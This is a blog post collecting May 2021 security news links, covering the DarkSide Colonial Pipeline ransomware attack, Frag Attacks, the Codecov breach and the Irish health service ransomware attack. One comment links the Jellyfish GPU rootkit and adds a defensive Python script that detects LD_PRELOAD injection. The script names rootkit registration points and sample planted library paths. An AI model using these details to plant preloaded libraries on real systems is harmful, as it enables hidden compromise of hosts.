This posting is here to collect cyber security news in May 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
318 Comments
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Researcher discovers a series of vulnerabilities, known as Frag Attacks, impacting Wi-Fi devices from the past 24 years, even when WEP and WPA are activated — A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating …
WiFi devices going back to 1997 vulnerable to new Frag Attacks
https://therecord.media/wifi-devices-going-back-to-1997-vulnerable-to-new-frag-attacks/
A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating back as far back as 1997 and affecting devices sold for the past 24 years.
The vulnerabilities, known as Frag Attacks, allow an attacker within a device’s WiFi radio range to gather information about the owner and run malicious code to compromise a device, may it be a computer, smartphone, or other smart device.
Devices are also vulnerable even if the WiFi standard’s security protocols were activated, such as WEP and WPA.
Tomi Engdahl says:
Michael Holden / Reuters:
UK unveils Online Safety Bill which would fine social media firms up to 10% of revenue or £18M if they fail to address online abuses such as racist hate crimes — LONDON (Reuters) – Britain said on Wednesday a planned new law would see social media companies fined up to 10% of turnover …
UK unveils law to fine social media firms which fail to remove online abuse
https://www.reuters.com/article/uk-britain-politics-tech-idUSKBN2CS30C
LONDON (Reuters) – Britain said on Wednesday a planned new law would see social media companies fined up to 10% of turnover or 18 million pounds ($25 million) if they failed to stamp out online abuses such as racist hate crimes, while senior managers could also face criminal action.
The Online Safety Bill also seeks to strengthen the right to freedom of expression, and ensure democratic political debate and journalistic content is protected, the government said.
“It’s time for tech companies to be held to account and to protect the British people from harm. If they fail to do so, they will face penalties,” interior minister Priti Patel said.
Tomi Engdahl says:
Panic Buying Is Causing Fuel Shortages Along The Colonial Pipeline Route
https://www.forbes.com/sites/rrapier/2021/05/11/panic-buying-is-causing-gas-shortages-along-the-colonial-pipeline-route/
Because the Colonial Pipeline is such an important supply line for the southeast and the East Coast, a major disruption can quickly lead to shortages in fuel supplies across these regions. We have seen this in the past when the pipeline had to be down for more than a few days.
Hence, these regions braced for the worst following last Friday’s ransomware attack by the professional hacker group called Darkside. The Colonial Pipeline was taken down in response to the attack, and as of today the pipeline remains offline. Colonial Pipeline Company has said that it hopes to restore most operations by the end of the week.
But a weeklong outage on this pipeline is enough to spark regional shortages. Bloomberg reported that Colonial Pipeline Chief Executive Officer Joseph Blount warned state officials on Monday that supply shortages could occur before pipeline service is restored.
In any case, the fear of shortages is often enough to create actual shortages, and this is playing out across the pipeline’s route.
Fuel outages are being reported in Virginia, North Carolina, Georgia, Florida, and South Carolina. If you are wondering whether your area may be impacted by the outage, the Energy Information Administration released a map showing the major locations serviced by the pipeline.
https://www.eia.gov/todayinenergy/detail.php?id=47917
Tomi Engdahl says:
Anyone Can Identify And Report Stolen Art Instantly With New Interpol App
https://trib.al/owGecN1
Interpol launched a new mobile phone app Thursday that lets users search and identify stolen art pieces using image-recognition software, a tool authorities hope will help recover lost artwork and prevent trafficking.
Interpol’s ID-Art app allows users to take a photo in-app, upload an image or enter key descriptive terms into a search engine that runs against the organization’s stolen art database, which has information about more than 52,000 lost pieces of art.
If the work appears to match a registered stolen work, the app shows users more information about the lost piece and prompts them to report the item to Interpol with a pop up banner.
Tomi Engdahl says:
Threat Actor Compromised More than 25 Percent of Tor Network Relays, Research Shows
https://hotforsecurity.bitdefender.com/blog/threat-actor-compromised-more-than-25-percent-of-tor-network-relays-research-shows-25805.html
Unknown actors took control over a quarter of all Tor network relays to launch man-in-the-middle attacks, target bitcoin addresses and much more.
Tor is a software that lets users obfuscate their network traffic by routing it automatically through numerous volunteer-operated relays worldwide. That traffic is typically encrypted, so intercepting it is not really an option, but the attacker did something more subtle.
Security researcher ‘nusenu’ published an extensive analysis of the threat actors’ actions in 2021, saying that it’s likely the most significant relay compromise to date, covering around 27 percent of Tor Network Relays, a conservative estimate.
One problem the researcher found relates to how the Tor browser deals with unsecure links. It turns out that the Tor browser is not HTTPS-only, which means that it can also display HTTP. Showing websites in plain text is a gold mine for attackers looking for valuable information.
The researcher also says the full nature of the attacks is not known, with a few exceptions.
“We know about mitmproxy, sslstrip, bitcoin address rewrites and download modification attacks but it is not possible to rule out other types of attacks. Imagine an attacker runs 27% of the tor network’s exit capacity and a firefox exploit affecting Tor Browser gets published before all users got their (auto)updates,” said nusenu.
https://nusenu.medium.com/tracking-one-year-of-malicious-tor-exit-relay-activities-part-ii-85c80875c5df
Tomi Engdahl says:
WiFi vulnerability may leave millions of devices open to ‘frag attacks’
https://www.engadget.com/wifi-vulnerability-devices-frag-attacks-095048302.html
A security researcher known for pointing out faults in WiFi security has discovered another vulnerability. The newly unearthed flaws, known as “frag attacks,” are believed to be widespread as they stem from the WiFi standard, with some bugs dating back to 1997. While several additional vulnerabilities are caused by programming mistakes in WiFi products and affect every WiFi device, Belgian security researcher Mathy Vanhoef wrote on his blog.
Theoretically, if exploited, the vulnerabilities would allow an attacker within radio range to steal user information or attack devices. But, the chances of the flaws being abused should be low as the attacks require user interaction or uncommon network settings.
https://www.fragattacks.com/
Tomi Engdahl says:
The DarkSide hacking group has made as much as $30 million in the past six months. Its ransomware-as-a-service model appears to be working, as the shutdown of the largest U.S. fuel pipeline demonstrates.
The Colonial Pipeline Hackers Are One Of The Savviest Criminal Startups In A $370 Million Ransomware Game
https://www.forbes.com/sites/thomasbrewster/2021/05/12/the-colonial-pipeline-hackers-are-one-of-the-savviest-criminal-startups-in-a-370-million-ransomware-game/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=5599362a7595
When Colonial Pipeline took its gasoline lines down following a successful cyberattack last week, it became the most high-profile victim of a hacking group called DarkSide.
But DarkSide isn’t a single entity. It’s a media-savvy, semiprofessional startup and software supplier for an illicit market of hackers looking for a quick easy way to breach and extort large businesses. In a ransomware game that, according to data from cryptocurrency tracker Chainalysis, has seen $370 million 2020 revenue for the criminals in the form of ransom payments, DarkSide and its partners represent a dangerous new breed of underground businesses that are working together to menace legitimate organizations, across public and private sectors.
The security industry calls DarkSide’s business model “ransomware-as-a-service,” as it mimics the software-as-a-service model
According to FireEye, the security company whose Mandiant division is helping the Colonial Pipeline recover, partners take 25% of ransom fees less than $500,000 and 10% of ransom fees above $5 million. Though that’s a sizable cut of the proceeds, the DarkSide operators make ransomware attacks so simple, customers keep coming. “It’s a great way of making quick money,” says Peter Kruse, founder and CEO of CSIS Security Group, which says it has seen various cybercrime actors using the DarkSide ransomware service.
To stand out from the crowd, DarkSide has promised the best encryption speeds to lock up computers faster than anyone else. It also supports attacks on both Microsoft Windows and Linux operating systems.
Lax security may be helping the hackers. Before DarkSide’s malware can be deployed, its customers first need to have broken into a network, and DarkSide doesn’t provide that service. Kruse says DarkSide’s partners look for vulnerable devices that can be found by scanning the web. Once those systems are found, they can be exploited and leverage gained on a target’s network. They then need to take control of other connected computers and install the DarkSide software, which wraps the victims’ data and locks it with keys targets must pay ransom to use.
“If I was going to hack that… I’d simply use a publicly available tool to connect to that port, run a little script and try all the credentials that I have, plus some of the common … default usernames and passwords,” Maley added. That “credential stuffing” attack could then provide enough network access to start finding a way to plant the ransomware.
There’s long been concern that critical infrastructure businesses aren’t well-prepared for the kinds of attack described by Maley, even if they’re far from the most sophisticated attacks the internet sees every day. “Legacy industrial control systems and other similar infrastructures were primarily designed to keep information in and execute their control tasks dependably and consistently. Unfortunately, there were little or no provisions built in to adequately secure the systems and keep people out,”
Personnel is another issue. Kruse and Maley noted that Colonial didn’t appear to have anyone in charge of cybersecurity. Colonial said its chief information officer, hired in 2017, led cybersecurity efforts, undertaking a review of its defenses and increasing total spending on IT, including cybersecurity, by more than 50% in the past four years. A spokesperson told Forbes it had “robust protocols and software in place to detect and address threats proactively and reactively,” and that its third-party incident response team determined it was following “best practices” before the breach. Any speculation about the root cause of the incident would be premature and not informed by the facts, they added. They declined to comment on whether or not a ransom had been paid, and wouldn’t say how much the hackers had demanded.
Another group, Babuk, has shown in the past month how devastating public shaming can be, after it hacked into the Washington, D.C., Metropolitan Police Department. When the police didn’t pay the $4 million ransom, Babuk started releasing the personal information of officers.
DarkSide has used a different tactic to try to improve its public image, presenting itself as a kind of Robinhood hacking organization, giving a small portion of stolen funds to charity, offering short-sellers advance information so they can bet on a victim’s stock tanking, and promising not to attack certain industries: hospitals, funeral services, schools, universities, nonprofits and government organizations. It even claims to only permit attacks on companies it knows can afford to pay, saying, “We do not want to kill your business.” As the group wrote on its dark web “press center” earlier this week: “Our goal is to make money, and not creating [sic] problems for society.”
With the Colonial Pipeline, DarkSide apparently realized too late that one of its partners had targeted an industry that served a huge number of consumers with gasoline and subsequently promised to “introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.” Now the world has its eyes on the hacking group. In a “flash notice” to the cybersecurity industry and government agencies this week, the FBI said it has been investigating DarkSide since October, just two months after it emerged. Its investigators and global partners have had increasing success against malware operators in recent months
the only authorities DarkSide appears to fear are Russian-speaking: Its malware won’t work if it detects its victim is Russian. This has led to accusations that the Kremlin either supports or harbors criminals that target Western businesses, something Putin’s government has staunchly denied. Dmitri Alperovitch, cofounder of cybersecurity company CrowdStrike and now executive chairman at the Silverado Policy Accelerator nonprofit, says there’s no evidence DarkSide has obvious links to Russian intelligence, adding, “Given their long past history of willful harboring of cybercrime, I don’t think it matters.”
Tomi Engdahl says:
From the original Vice article “A gang of cybercriminals who hacked the Washington D.C. Metropolitan Police Department have started leaking alleged internal police files, including “background investigations” on police officers that includes psychological evaluations, polygraph responses, supervisor interviews, their credit history, information about their home, their social security numbers, date of birth, personal emails, home address, phone numbers, their driver’s licenses, financial details, and their handwritten signatures. ”
https://www.vice.com/en/article/wx5deq/hackers-leak-personal-data-of-washington-dc-police-officers
Tomi Engdahl says:
Pipeline operations restarted at around 5 p.m. Eastern time Wednesday.
Colonial Pipeline Restarts Operations After Hack, But Fuel Shortages Will Linger
https://www.forbes.com/sites/nicholasreimann/2021/05/12/colonial-pipeline-restarts-operations-after-hack-but-fuel-shortages-to-linger/
Tomi Engdahl says:
BIG NUMBER
11. That’s how many states are dealing with significant fuel shortages, according to gas station finding-app Gasbuddy. North Carolina has been by far the hardest-hit, with 65% of gas stations reporting no fuel Wednesday afternoon.
https://www.forbes.com/sites/nicholasreimann/2021/05/12/colonial-pipeline-restarts-operations-after-hack-but-fuel-shortages-to-linger/
Tomi Engdahl says:
https://portswigger.net/daily-swig/remote-mouse-mobile-app-contains-raft-of-zero-day-rce-vulnerabilities
Tomi Engdahl says:
“I mean an eighth-grader could have hacked into that system.”
Tech audit of Colonial Pipeline found ‘glaring’ problems
By FRANK BAJAK
May 13, 2021
https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
BOSTON (AP) — An outside audit three years ago of the major East Coast pipeline company hit by a cyberattack found “atrocious” information management practices and “a patchwork of poorly connected and secured systems,” its author told The Associated Press.
“We found glaring deficiencies and big problems,” said Robert F. Smallwood, whose consulting firm delivered an 89-page report in January 2018 after a six-month audit. “I mean an eighth-grader could have hacked into that system.”
How far the company, Colonial Pipeline, went to address the vulnerabilities isn’t clear.
Tomi Engdahl says:
Rapid7 source code, credentials accessed in Codecov supply-chain attack
https://www.bleepingcomputer.com/news/security/rapid7-source-code-credentials-accessed-in-codecov-supply-chain-attack/
US cybersecurity firm Rapid7 has disclosed that some source code repositories were accessed in a security incident linked to the supply-chain attack that recently impacted customers of the popular Codecov code coverage tool.
The computer and network security company has already notified a “small subset of customers” potentially impacted by this breach to take measures to mitigate any potential risks.
Only internal credentials and tooling source code accessed
The unknown threat actors behind this incident were only able to gain access to a “small subset” of repositories containing source code for internal tooling used for Rapid7's Managed Detection and Response (MDR) service.
The cybersecurity firm added that the Codecov tools compromised in last month’s supply-chain attack were not used to work with production code.
“Our use of Codecov’s Bash Uploader script was limited: it was set up on a single CI server used to test and build some internal tooling for our Managed Detection and Response (MDR) service,” Rapid7 said.
The compromised tool allowed the threat actors to harvest sensitive information (e.g., credentials, tokens, or API keys) from customers’ continuous integration (CI) environments and send it to attacker-controlled servers for more than two months.
Two weeks after disclosing the breach discovered on April 1st, Codecov began notifying customers affected by the supply-chain attack
Tomi Engdahl says:
https://voidsec.com/nvidia-geforce-experience-command-execution/
Tomi Engdahl says:
Report: U.S. Officials Investigating Crypto Exchange Binance Amid Market’s Massive Boom
https://www.forbes.com/sites/jonathanponciano/2021/05/13/report-binance-investigation-crypto-market/
The Department of Justice and Internal Revenue Service have reportedly opened an investigation into cryptocurrency exchange Binance, heightening tensions in the largely unregulated industry amid unprecedented market volatility and reports that hackers demanded a $5 million cryptocurrency ransom from the fuel company that halted operations this week.
cryptocurrencies “a particular concern,” and urged lawmakers to take action to “curtail their use,” particularly to ensure they’re not used for illicit financing.
Colonial Pipeline reportedly paid hackers $5 million in an unidentified cryptocurrency on Friday following a cyberattack that forced the pipeline offline and created a severe gas shortage.
Hackers Got $5 Million: Colonial Pipeline Reportedly Paid A Ransom In Cryptocurrency, Contrary To Claims
https://www.forbes.com/sites/melissaholzberg/2021/05/13/hackers-got-5-million-colonial-pipeline-reportedly-paid-a-ransom-in-cryptocurrency-contrary-to-claims/?sh=31bd8e3f799e
TOPLINE The Colonial Pipeline Company reportedly paid hackers $5 million on Friday following a cyberattack that forced the pipeline offline and created a severe gas shortage, sources told Bloomberg News Thursday, which conflicts with reports the company would not pay a ransom.
Colonial was attacked by DarkSide, a group of hackers in Eastern Europe, on Friday and the company was forced to stop service of 2.5 million barrels of gasoline for five days.
The pipeline company reportedly paid the $5 million in cryptocurrency soon after the cyberattack, but the tool the hackers gave the company to restore its computer network took too long to work.
The Washington Post reported Wednesday the company was working with FireEye, a cybersecurity company, to recover its systems rather than pay the ransom, and the FBI does not recommend paying ransomware hackers because it “doesn’t guarantee you or your organization will get any data back.”
Colonial announced Wednesday night pipeline service was fully restored, but many gas stations continued to experience gas shortages as the company warned there would be “intermittent service interruptions” over the next few days.
The national average gas price climbed to $3.028 a gallon on Thursday, the highest it’s been in six years, according to AAA
Tomi Engdahl says:
A security researcher found Wi-Fi vulnerabilities that have existed since the beginning
The cycle of painful updates begins anew
https://www.theverge.com/2021/5/12/22433134/fragattacks-wi-fi-vulnerabilities-update-security
The security researcher who discovered the Krack Wi-Fi vulnerability has discovered a slew of other flaws with the wireless protocol most of us use to power our online lives (via Gizmodo). The vulnerabilities relate to how Wi-Fi handles large chunks of data, with some being related to the Wi-Fi standard itself, and some being related to how it’s implemented by device manufacturers.
The researcher, Mathy Vanhoef, calls the collection of vulnerabilities “FragAttacks,” with the name being a mashup of “fragmentation” and “aggregation.” He also says the vulnerabilities could be exploited by hackers, allowing them to intercept sensitive data, or show users fake websites, even if they’re using Wi-Fi networks secured with WPA2 or even WPA3. They could also theoretically exploit other devices on your home network.
There are twelve different attack vectors that fall under the classification, which all work in different ways. One exploits routers accepting plaintext during handshakes, one exploits routers caching data in certain types of networks, etc. If you want to read all the technical details on how exactly they work, you can check out Vanhoef’s website.
https://www.fragattacks.com/
Three of the discovered vulnerabilities are design flaws in the Wi-Fi standard and therefore affect most devices. On top of this, several other vulnerabilities were discovered that are caused by widespread programming mistakes in Wi-Fi products. Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities.
The discovered vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the original security protocol of Wi-Fi, called WEP, is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997! Fortunately, the design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. As a result, in practice the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit.
The discovery of these vulnerabilities comes as a surprise, because the security of Wi-Fi has in fact significantly improved over the past years. For instance, previously we discovered the KRACK attacks, the defenses against KRACK were proven secure, and the latest WPA3 security specification has improved. Unfortunately, a feature that could have prevented one of the newly discovered design flaws was not adopted in practice, and the other two design flaws are present in a feature of Wi-Fi that was previously not widely studied. This shows it stays important to analyze even the most well-known security protocols (if you want to help, we are hiring). Additionally, it shows that it’s essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them.
Tomi Engdahl says:
- It should be illegal to pay Ransoms. Problem solved.
Colonial Pipeline Shells Out $5M in Extortion Payout, Report
https://threatpost.com/colonial-pays-5m/166147/
According to news reports, Colonial Pipeline paid the cybergang known as DarkSide the ransom it demanded in return for a decryption key.
Colonial Pipeline Co., operator of the largest U.S. fuel pipeline, reportedly paid $5 million to criminals behind a ransomware attack that has sent fuel prices spiking up and down the East Coast.
Sources familiar with the payout told Bloomberg that representatives of Colonial Pipeline paid the cybergang known as DarkSide the ransom it demanded in return for a decryption tool that allowed the firm to restore its computer network disabled in last week’s attack.
On Wednesday, the energy firm restarted its pipeline operations after five days of being shut down: a shutdown done proactively following the ransomware attack.
News of the payment is an about-face: according to reports on Wednesday, the company had no intention of paying the ransom.
“The company paid the hefty ransom in difficult-to-trace cryptocurrency within hours after the attack, underscoring the immense pressure faced by the Georgia-based operator to get gasoline and jet fuel flowing again to major cities along the Eastern Seaboard,” Bloomberg reporters William Turton, Michael Riley and Jennifer Jacobs wrote.
Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom
https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom
Tomi Engdahl says:
https://www.fragattacks.com/
https://github.com/vanhoefm/fragattacks/blob/master/SUMMARY.md
Tomi Engdahl says:
The cyberattack has disrupted some health services in the country, but its Covid-19 vaccine rollout remains unaffected.
Ireland’s Health System Forced To Shut Computer Systems After Being Hit By ‘Significant’ Ransomware Attack
https://trib.al/GbV2asH
Ireland’s national health service operator was hit by a major ransomware attack that forced it to shut down all of its IT systems, the government agency announced on Friday, adding that its Covid-19 vaccination program remains unaffected.
Tomi Engdahl says:
We Found Joe Biden’s Secret Venmo. Here’s Why That’s A Privacy Nightmare For Everyone.
https://www.buzzfeednews.com/article/ryanmac/we-found-joe-bidens-secret-venmo
The peer-to-peer payments app leaves everyone from ordinary people to the most powerful person in the world exposed.
BuzzFeed News found President Joe Biden’s Venmo account after less than 10 minutes of looking for it, revealing a network of his private social connections, a national security issue for the United States, and a major privacy concern for everyone who uses the popular peer-to-peer payments app.
On Friday, following a passing mention in the New York Times that the president had sent his grandchildren money on Venmo, BuzzFeed News searched for the president’s account using only a combination of the app’s built-in search tool and public friends feature. In the process, BuzzFeed News found nearly a dozen Biden family members and mapped out a social web that encompasses not only the first family, but a wide network of people around them, including the president’s children, grandchildren, senior White House officials, and all of their contacts on Venmo.
The president’s transactions are not public, and BuzzFeed News is not identifying the usernames for the accounts mentioned in this story due to national security concerns.
Privacy advocates and journalists have warned about Venmo’s privacy problems for years, yet the PayPal-owned app has persisted with features that can place people — including the president of the United States — at risk.
Tomi Engdahl says:
Elliptic Follows the Bitcoin Ransoms Paid by Colonial Pipeline and Other DarkSide Ransomware Victims
https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims
Elliptic has identified the Bitcoin wallet used by the DarkSide ransomware group to receive ransom payments from its victims, based on our intelligence collection and analysis of blockchain transactions. This wallet received the 75 BTC payment made by Colonial Pipeline on May 8, following the crippling cyberattack on its operations – leading to widespread fuel shortages in the US.
The wallet has been active since 4th March 2021 and has received 57 payments from 21 different wallets. Some of these payments directly match ransoms known to have been paid to DarkSide by other victims, such as 78.29 BTC (worth $4.4 million) sent by chemical distribution company Brenntag on May 11.
In total, the DarkSide wallet has received Bitcoin transactions since March with a total value of $17.5 million. Ransoms associated with previous attacks were paid to other wallets.
We can also use blockchain analysis to follow the money trail and determine where DarkSide is sending its ransomware proceeds, to launder them or convert them to cash.
Tomi Engdahl says:
It wasn’t just Peloton with a leaky API. Its rival, Echelon, did too. https://tcrn.ch/3og9s2Y
Echelon exposed riders’ account data, thanks to a leaky API
https://techcrunch.com/2021/05/14/echelon-leaky-api-riders-account-data/?tpcc=ECFB2021
Peloton wasn’t the only at-home workout giant exposing private account data. Rival exercise giant Echelon also had a leaky API that let virtually anyone access riders’ account information.
Fitness technology company Echelon, like Peloton, offers a range of workout hardware — bikes, rowers and a treadmill — as a cheaper alternative for members to exercise at home. Its app also lets members join virtual classes without the need for workout equipment.
But Jan Masters, a security researcher at Pen Test Partners, found that Echelon’s API allowed him to access the account data — including name, city, age, sex, phone number, weight, birthday and workout statistics and history — of any other member in a live or pre-recorded class.
Tomi Engdahl says:
Security News This Week: Microsoft Will Soon Kill Flash on Windows 10 for Good
Plus: A Peloton data leak, Russian hacker details, and more of the week’s top security news.
https://www.wired.com/story/flash-windows-10-peloton-bug-russian-svr-hackers-security-news/
Tomi Engdahl says:
https://www.forbes.com/sites/daveywinder/2021/05/07/google-to-suddenly-flip-the-security-switch-on-millions-of-gmail-accounts/
Tomi Engdahl says:
Darkside Hackers : Everything You Need To Know About The Colonial Pipeline DarkSide Ransomware Attack
https://www.rebellionresearch.com/darkside-hackers-everything-you-need-to-know-about-the-colonial-pipeline-darkside-ransomware-attack
The hackers behind the attack, the DarkSide Ransomware Gang, generally operate within a “Ransomware-as-a-Service” business model. In simple terms, this means that they lease their malicious code to cybercriminals that wish to extort ransoms from potential victims but lack the technical expertise to design their own proprietary malware.
DarkSide is only one of many outfits that sell code, and additionally, they engage in “Double Extortion” tactics that include both file encryption and threats to publish stolen data via a “dark web” leak site.
Generally, groups like Darkside will provide victims with a ransom note and request payment in Bitcoin. If the payment request is ignored, the victims' files will remain encrypted and inaccessible, and the group will publish sensitive files to attempt to shame the victim and compel them to pay up. It also serves as a tactic to intimidate future victims into believing that there will be a consequence for non-payment.
“We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for other motives [sic],” the group said on their data leak site. “Our goal is to make money, and not create problems for society. From today we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”
DarkSide generally only targets large corporations and does not allow its customers to employ ransomware against several industries that include education, healthcare, funeral services and nonprofits.
Tomi Engdahl says:
https://arstechnica.com/gadgets/2021/05/dell-patches-a-12-year-old-privilege-escalation-vulnerability/
Tomi Engdahl says:
New Spectre attack once again sends Intel and AMD scrambling for a fix
https://arstechnica.com/gadgets/2021/05/new-spectre-attack-once-again-sends-intel-and-amd-scrambling-for-a-fix/
Tomi Engdahl says:
Apple AirTag hacked again – free internet with no mobile data plan!
https://nakedsecurity.sophos.com/2021/05/14/apple-airtags-hacked-again-free-internet-with-no-mobile-data-plan/
Earlier this week we wrote about a jailbreak hack against Apple’s newly introduced AirTag product.
In that story, the researcher @ghidraninja was able to modify the firmware on the AirTag itself, despite the anti-tampering protection implemented by Apple’s own AirTag firmware programming.
But this “attack” (if that is the right word) is different, because it doesn’t involve modifying or cracking the AirTag itself.
Instead, it involves using the AirTag protocol on a Bluetooth device that doesn’t have internet connectivity in order to “trick” (if that is the right word) nearby Apple devices into sending data over the internet on its behalf.
Very loosely put: free internet access!
(But with some spectacular limitations on bandwidth and latency, as we shall see below.)
In the paper describing the hack, the device used was a cheap and easily programmable ESP32 Bluetooth/Wi-Fi chip commonly used in IoT devices and readily available from hobby electronics websites.
Tomi Engdahl says:
https://www-theverge-com.cdn.ampproject.org/c/s/www.theverge.com/platform/amp/2021/5/12/22433134/fragattacks-wi-fi-vulnerabilities-update-security
Tomi Engdahl says:
Ransomware shut down Ireland's healthcare IT system – minister: Probably the most serious cyberattack in Ireland
Authorities assure that no patient data fell into the wrong hands. The system governing coronavirus vaccinations did not go down, but new test appointments cannot be booked.
https://yle.fi/uutiset/3-11932194
Tomi Engdahl says:
Jellyfish is a Linux based userland gpu rootkit proof of concept project utilizing the LD_PRELOAD technique from Jynx (CPU), as well as the OpenCL API developed by Khronos group (GPU). Code currently supports AMD and NVIDIA graphics cards. However, the AMDAPPSDK does support Intel as well.
https://github.com/nwork/jellyfish
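An LD_PRELOAD rootkit of this kind has to be registered somewhere for the dynamic loader to pick it up: either in the system-wide `/etc/ld.so.preload` file or in the `LD_PRELOAD` variable of a process environment. The following is an added example, not code from the Jellyfish or Jynx projects, that parses both sources and flags preload entries pointing outside the usual library directories. The `TRUSTED_PREFIXES` list and the sample inputs are constructed for the example.

```python
"""Look for LD_PRELOAD-style library injection on a Linux host.

Added example (not part of the Jellyfish project). It checks the two places a
userland rootkit of this kind typically registers itself: the system-wide
/etc/ld.so.preload file and the LD_PRELOAD variable in running processes'
environments. Inputs are passed in so the logic can be exercised on
constructed samples; read_live_host() gathers the same inputs from /proc.
"""
import os
from typing import Dict, List

# Directories from which preloaded libraries are normally expected to come.
# Anything outside these (e.g. /tmp, /dev/shm, a home directory) is flagged.
# Assumption for this example; adjust to the distribution's layout.
TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def parse_ld_so_preload(text: str) -> List[str]:
    """Return library paths listed in ld.so.preload (whitespace/colon separated, '#' comments)."""
    libs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        libs.extend(line.replace(":", " ").split())
    return libs


def parse_environ_blob(blob: bytes) -> Dict[str, str]:
    """Parse the NUL-separated KEY=VALUE blob found in /proc/<pid>/environ."""
    env = {}
    for item in blob.split(b"\0"):
        if b"=" in item:
            key, _, value = item.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspicious_libs(paths: List[str]) -> List[str]:
    """Flag preload entries that are not absolute paths under a trusted library dir."""
    return [p for p in paths if not p.startswith(TRUSTED_PREFIXES)]


def check_preload(ld_so_preload_text: str, process_environs: Dict[int, bytes]) -> List[str]:
    """Return findings for the given ld.so.preload text and per-PID environ blobs."""
    findings = []
    for lib in suspicious_libs(parse_ld_so_preload(ld_so_preload_text)):
        findings.append(f"/etc/ld.so.preload: untrusted preload {lib}")
    for pid, blob in process_environs.items():
        env = parse_environ_blob(blob)
        if "LD_PRELOAD" in env:
            for lib in suspicious_libs(env["LD_PRELOAD"].replace(":", " ").split()):
                findings.append(f"pid {pid}: LD_PRELOAD={lib}")
    return findings


def read_live_host() -> List[str]:
    """Gather the same inputs from the running system (needs read access to /proc/<pid>/environ)."""
    try:
        with open("/etc/ld.so.preload") as fh:
            preload_text = fh.read()
    except OSError:
        preload_text = ""
    environs = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                with open(f"/proc/{name}/environ", "rb") as fh:
                    environs[int(name)] = fh.read()
            except OSError:
                continue  # not our process, or it exited meanwhile
    return check_preload(preload_text, environs)


# Constructed sample: one legitimate system entry and one planted library.
SAMPLE_PRELOAD = "# preloaded libs\n/usr/lib/libfakeroot.so\n/tmp/.x/jellyfish.so\n"
SAMPLE_ENVIRONS = {
    1234: b"PATH=/usr/bin\0LD_PRELOAD=/dev/shm/libjf.so\0HOME=/root\0",
    5678: b"PATH=/usr/bin\0HOME=/home/user\0",
}

if __name__ == "__main__":
    for finding in check_preload(SAMPLE_PRELOAD, SAMPLE_ENVIRONS):
        print(finding)
```

Caveat for live use: a preload library hooks libc in every dynamically linked process, including the one running this check, so it can hide its own file and its own `ld.so.preload` line from `open` and `readdir`. Run the check from a statically linked tool or against the disk image offline when a rootkit is actually suspected.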
Tomi Engdahl says:
The folder name is literally “Don’t ship it with your game.”
Fall Guys studio accidentally leaks the source code onto Steam
By Andy Chalk 2 days ago
Should’ve paid more attention to that folder name.
https://www.pcgamer.com/fall-guys-studio-accidentally-leaks-the-source-code-onto-steam/?utm_source=facebook.com&utm_medium=social&utm_campaign=socialflow
The weekend got off to what was likely a very interesting start for Fall Guys studio Mediatonic, which apparently—somehow—managed to leak the game’s source code in an accidental Steam update.
The whole thing was deleted very quickly, of course, but not before the big banana-slip was noticed and captured for posterity by SteamDB creator Pavel Djundik.
The name of the directory through which everything flowed out into the digital ether—”BackUpThisFolder_ButDontShipItWithYourGame”—makes the whole thing seem even funnier from an outsider’s perspective, but it’s actually auto-generated by Unity to contain data required to debug games, including PDB files and C++ code generated from scripts. In case the folder name isn’t sufficiently clear, the Unity docs also warn the developers “should back up this folder for every build you ship, but don’t redistribute it.”
Tomi Engdahl says:
We Found Joe Biden's Secret Venmo. Here's Why That's A Privacy Nightmare For Everyone.
https://www.buzzfeednews.com/article/ryanmac/we-found-joe-bidens-secret-venmo
BuzzFeed News found President Joe Biden's Venmo account after less than 10 minutes of looking for it, revealing a network of his private social connections, a national security issue for the United States, and a major privacy concern for everyone who uses the popular peer-to-peer payments app.
Tomi Engdahl says:
HTML Phishing Email Opens the Door for Threat Actors https://cofense.com/blog/html-phishing-email/
The Cofense Phishing Defense Center (PDC) has observed a credential phishing trend whereby threat actors are sending out several emails to employees with nothing more than an HTML attachment and subject line, OfficeDoc Important Business/Work Guide. As organizations are planning for return-to-work procedures, threat actors are leveraging this theme to increase the likelihood of user interaction with the attachment.
Tomi Engdahl says:
Chemical distributor pays $4.4 million to DarkSide ransomware https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/
In this particular case, the DarkSide affiliate claims to have gotten access to the network after purchasing stolen credentials. However, the DarkSide affiliate does not know how the credentials were originally obtained.
Tomi Engdahl says:
Ireland's Health Services hit with $20 million ransomware demand https://www.bleepingcomputer.com/news/security/ireland-s-health-services-hit-with-20-million-ransomware-demand/
Yesterday, a cybersecurity researcher shared a screenshot of a chat between Conti and Ireland's HSE with BleepingComputer. In the screenshot, the Conti gang claims to have had access to the HSE network for two weeks. During this time, they claim to have stolen 700 GB of unencrypted files from the HSE, including patient info and employee info, contracts, financial statements, payroll, and more.
Tomi Engdahl says:
DarkSide Drama Isn't The Death Of Ransomware – It's Not Even The Death Of DarkSide https://www.forbes.com/sites/daveywinder/2021/05/15/darkside-faq-who-are-the-5-million-colonial-pipeline-ransomware-attackers/
